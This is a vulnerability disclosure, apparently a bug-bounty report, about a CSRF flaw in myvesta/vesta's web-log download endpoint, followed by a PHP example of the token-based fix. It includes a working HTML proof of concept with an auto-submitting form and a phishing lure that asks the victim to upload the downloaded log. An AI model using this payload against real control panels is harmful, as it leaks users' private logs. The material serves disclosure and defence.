Cross-Site Request Forgery (CSRF) in myvesta/vesta
Valid
Aug 24th 2021
The download/web-log endpoint has no CSRF protection. This can be abused to force a download of the
access log of a logged-in user and potentially leak sensitive information.
🕵️♂️ Proof of Concept
Log in to a user account, create the following POC.html file, and open it in the browser.
<html>
<body>
<h2>To verify that you are a human, upload the file that has been downloaded from our website now.</h2>
<script>history.pushState('', '', '/')</script>
<!-- GET form targeting the unprotected log download endpoint; no token is required -->
<form action="https://demo.myvesta.com/download/web-log/">
<input type="hidden" name="domain" value="demo.myvesta.com" />
<input type="hidden" name="type" value="access" />
<input type="submit" value="Submit request" />
</form>
<!-- document.forms is a collection, so the first form must be selected before submit() -->
<script>document.forms[0].submit();</script>
</body>
</html>
POC.html downloads the user's data from the application without the user's permission. An attacker can then trick the user into uploading this file to an attacker-controlled server.
Potential leakage of private information through phishing, by exploiting the missing CSRF token.
Tested on Edge, Firefox, Chrome and Safari.
You should set a CSRF token on such GET requests.
📍 Location index.php#L1
📝 References csrf
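The recommended fix, as an added PHP example that is not Vesta's own code: a per-session token is issued, embedded in the download link, and verified with a constant-time comparison before the log is served. The session key name and the endpoint file path are assumptions.

```php
<?php
// Added example (not myvesta/vesta code). Session key 'csrf_token' is an assumed name.
session_start();

// Issue one random token per session; reuse it so every link in the panel carries the same value.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars, CSPRNG-backed
    }
    return $_SESSION['csrf_token'];
}

// Verify the token sent with the request against the session copy.
// hash_equals() avoids a timing side channel; the isset/is_string checks keep
// a request with no session token or a non-string parameter from passing.
function csrf_check(array $request): bool {
    $token = $request['token'] ?? '';
    return isset($_SESSION['csrf_token'])
        && is_string($token)
        && hash_equals($_SESSION['csrf_token'], $token);
}

// --- In the download handler (assumed path: download/web-log/index.php) ---
// A cross-site form like the PoC cannot know the victim's session token, so
// the forged request is rejected here before any log file is read.
if (!csrf_check($_GET)) {
    http_response_code(403);
    exit('Missing or invalid CSRF token');
}
// ... existing domain/type validation and log download logic continues here ...

// --- In the page that renders the download link ---
// The token must be added to every legitimate link to this endpoint.
$domain = 'example.com'; // constructed sample value
printf(
    '<a href="/download/web-log/?domain=%s&type=access&token=%s">Download access log</a>',
    htmlspecialchars($domain, ENT_QUOTES, 'UTF-8'),
    htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8')
);
```

Requests that arrive at the endpoint without a valid token (a 403 in the web server log for /download/web-log/) are a useful signal when checking whether the endpoint was targeted.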